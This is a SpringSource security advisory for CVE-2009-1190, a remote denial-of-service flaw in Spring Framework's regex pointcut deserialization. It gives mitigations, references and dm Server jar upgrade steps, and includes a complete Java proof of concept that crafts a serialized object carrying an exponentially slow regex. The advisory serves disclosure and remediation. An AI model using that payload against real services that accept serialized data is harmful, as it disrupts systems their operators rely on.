Spring Framework Known Vulnerabilities and Issues
22 April 2009: CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Severity: Low
Vendor: SpringSource
Versions Affected: Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2; dm Server 1.0.0-1.0.2 (note: dm Server 2.x is not affected, since it requires a 1.6 JDK)
Description:
The java.util.regex.Pattern.compile method in the Sun 1.5 JDK has a problem ([1], [2]) with exponential compilation times when a pattern uses many optional groups. A workaround [3] was implemented in 1.4.2_06, but the root cause of the poor regex-processing performance was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]) from its inherited readObject method (from AbstractRegexpMethodPointcut). When an application running on a Sun 1.5 JVM with spring.jar on its classpath accepts serialized data, an attacker can supply a long regex string with many optional groups and consume enormous CPU resources; with a few such requests, all listeners are occupied compiling regular expressions indefinitely.
Mitigation:
- Users of all products may upgrade to JRE/JDK 1.6, which includes the fix for the root cause
- Spring Framework 2.5.6.SEC01 has been released for Community users; it includes a workaround for the root cause (see the update steps at the end of this notice)
- Spring Framework 2.5.6.SR02, which includes a workaround for the root cause, is available to Enterprise users; the software can be found in the Customer Portal here: http://www.springsource.com/spring_account
- Disable functionality that accepts serialized data from untrusted sources
- Spring Framework 3.0.0.M3, which includes a workaround for the root cause, will be released shortly
- dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jars with 2.5.6.SEC01 (see the detailed update steps at the end of this notice)
- dm Server 1.0.3, which includes a workaround for the root cause, will be released shortly
- Instrumented Spring Framework 2.5.6.SR02, which includes a workaround for the root cause, is available to Enterprise users; the software can be found in the Customer Portal here: http://www.springsource.com/spring_account
Example:
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import org.springframework.aop.support.JdkRegexpMethodPointcut;

public class DoSSpring {

    static byte[] getSerialized(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.flush();
        oos.close();
        return baos.toByteArray();
    }

    public static void main(String[] a) throws Exception {
        // A pattern made of many optional groups: exponential to compile on a Sun 1.5 JDK
        String thePattern = "(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)"
                + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)"
                + "?(W)?(I)?(U)?(a)?$";
        String longerPattern = thePattern.substring(0, thePattern.length() - 1) + thePattern;
        int length = longerPattern.length();
        // Placeholder of the same length, so setPattern() does not compile the real regex here
        String fakePattern = longerPattern.replaceAll(".", "A");
        JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
        jrmp.setPattern(fakePattern);
        System.out.println(jrmp);
        byte[] theArray = getSerialized(jrmp);
        // Find the placeholder in the serialized form and overwrite it with the real pattern
        int i = 0;
        for (; i < theArray.length; i++) {
            if (((char) theArray[i]) == 'A' && ((char) theArray[i + 1] == 'A')) {
                break;
            }
        }
        System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
        ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
        ObjectInputStream ois = new ObjectInputStream(bis);
        // readObject() compiles the pattern and returns after a very very long time
        Object o = ois.readObject();
    }
}
Credit:
This issue was discovered by the RedHat Security Response Team
References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
Spring Framework update steps:
- back up your application
- unzip the downloaded distribution and copy the Spring 2.5.6.SEC01 jars that you use in your application build from the dist or dist/modules directories, replacing the current 2.5.6 jars in your build
- rebuild and redeploy your application
dm Server update steps:
Prerequisites:
- springsource-dm-server-1.0.2.RELEASE
- spring-framework-2.5.6.SEC01
Note: For Enterprise customers of dm Server 1.0.2 who are using the instrumented Spring JARs: Instrumented Spring Framework 2.5.6.SR02, which includes a workaround for the root cause, will be released by April 27, 2009
Update Steps:
- In $DMS_HOME/lib
  - Remove: org.springframework.core-2.5.6.A.jar
  - Add: spring-core.jar
- In $DMS_HOME/repository/bundles/ext
  - Remove:
    org.springframework.aop-2.5.6.A.jar
    org.springframework.aspects-2.5.6.A.jar
    org.springframework.beans-2.5.6.A.jar
    org.springframework.context-2.5.6.A.jar
    org.springframework.context.support-2.5.6.A.jar
    org.springframework.core-2.5.6.A.jar
    org.springframework.jdbc-2.5.6.A.jar
    org.springframework.jms-2.5.6.A.jar
    org.springframework.orm-2.5.6.A.jar
    org.springframework.transaction-2.5.6.A.jar
    org.springframework.web-2.5.6.A.jar
    org.springframework.web-servlet-2.5.6.A.jar
  - Add:
    spring-aop.jar
    spring-aspects.jar
    spring-beans.jar
    spring-context.jar
    spring-context-support.jar
    spring-core.jar
    spring-jdbc.jar
    spring-jms.jar
    spring-orm.jar
    spring-tx.jar
    spring-web.jar
    spring-webmvc.jar
- In $DMS_HOME/repository/libraries/ext
  - Edit: org.springframework.spring-library-2.5.6.A.libd so that its contents are:
==
Library-SymbolicName: org.springframework.spring
Library-Version: 2.5.6.SEC01
Library-Name: Spring Framework
Import-Bundle:
 org.springframework.aop;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.aspects;version="[2.5.6.SEC01, 2.5.6.SEC01]";import-scope:=application,
 org.springframework.beans;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.context;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.context.support;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.core;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.jdbc;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.jms;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.orm;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.transaction;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.web;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 org.springframework.web.servlet;version="[2.5.6.SEC01, 2.5.6.SEC01]",
 com.springsource.org.aopalliance;version="[1.0.0, 1.0.0]"
==